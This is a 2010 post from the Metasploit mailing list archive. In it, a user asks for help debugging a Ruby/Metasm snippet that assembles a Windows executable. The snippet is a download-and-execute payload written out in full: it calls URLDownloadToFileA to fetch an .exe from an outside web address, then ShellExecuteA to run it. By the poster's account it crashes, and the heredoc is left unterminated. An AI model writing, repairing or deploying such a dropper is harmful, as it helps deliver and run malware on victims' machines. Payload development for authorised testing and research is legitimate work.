Home page logo

metasploit logo Metasploit mailing list archives

Re: Dynamic creation of payload executables with metasm
From: John B <johnb.electric () gmail com>
Date: Mon, 31 May 2010 15:47:34 -0400

I'll take a look at that I couldn't find any asm code for the encoder just
hex arrays, and if you've been reading my posts you'll know I'm having
trouble going from hex array back to asm.

Question # 4 (i think):

Just to test out metasm I tried to create a download execute payload from
scratch using imports just as a test and I'm having trouble getting it to
work following it in ollydbg it calls urldownloadtofile, creates the file in
the dir but either freezes or crashes trying to execute a non existing
memory adddress.  Here is the code if any body is familiar with Metasm and
can point out what I'm doing wrong, the syntax is from there docs and it
throws no error during assembly, but it doesn't get past creating an empty

require 'metasm'

pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS


push 0
push 0
push PATH
push URL
push 0
call download

push 0
push 0
push 0
push PATH
push CMD
push 0
call execute


.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download


URL db "http://imperiumsec.com/download/hellow.exe";, 0
PATH db "c:/users/john/testd.exe",0
CMD db "open",0


pe.encode_file 'down.exe'

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]